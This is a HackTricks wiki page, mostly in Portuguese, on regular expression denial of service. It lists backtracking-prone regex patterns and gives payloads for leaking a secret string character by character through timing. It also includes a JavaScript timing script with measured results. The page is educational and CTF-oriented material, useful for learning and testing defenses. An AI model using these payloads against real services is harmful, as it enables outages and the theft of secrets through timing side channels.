Regular expression Denial of Service - ReDoS

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Regular Expression Denial of Service (ReDoS)

Uma Negação de Serviço por Expressão Regular (ReDoS) acontece quando alguém se aproveita das fraquezas em como as expressões regulares (uma forma de buscar e combinar padrões em texto) funcionam. Às vezes, quando as expressões regulares são usadas, elas podem se tornar muito lentas, especialmente se o trecho de texto com o qual estão trabalhando ficar maior. Essa lentidão pode crescer tanto que se torna realmente rápida com até mesmo pequenos aumentos no tamanho do texto. Os atacantes podem usar esse problema para fazer um programa que usa expressões regulares parar de funcionar corretamente por um longo tempo.

O Algoritmo Ingênuo Problemático de Regex

Verifique os detalhes em https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS

Regexes Malignos

Um padrão de expressão regular maligno é aquele que pode ficar preso em uma entrada elaborada causando um DoS. Padrões de regex malignos geralmente contêm agrupamento com repetição e repetição ou alternância com sobreposição dentro do grupo repetido. Alguns exemplos de padrões malignos incluem:

(a+)+
([a-zA-Z]+)*
(a|aa)+
(a|a?)+
(.*a){x} para x > 10

Todos esses são vulneráveis à entrada aaaaaaaaaaaaaaaaaaaaaaaa!.

Payloads de ReDoS

Exfiltração de String via ReDoS

Em um CTF (ou bug bounty), talvez você controle a Regex com a qual uma informação sensível (a bandeira) é combinada. Então, pode ser útil fazer a página travar (timeout ou tempo de processamento mais longo) se a Regex combinar e não se não combinar. Dessa forma, você poderá exfiltrar a string caractere por caractere:

Em este post você pode encontrar esta regra de ReDoS: ^(?=<flag>)((.*)*)*salt$
Exemplo: ^(?=HTB{sOmE_fl§N§)((.*)*)*salt$
Em este writeup você pode encontrar este: <flag>(((((((.*)*)*)*)*)*)*)!
Em este writeup ele usou: ^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$

Controle de Entrada e Regex de ReDoS

Os seguintes são exemplos de ReDoS onde você controla tanto a entrada quanto a regex:

function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$",   //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/

Ferramentas

Referências

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)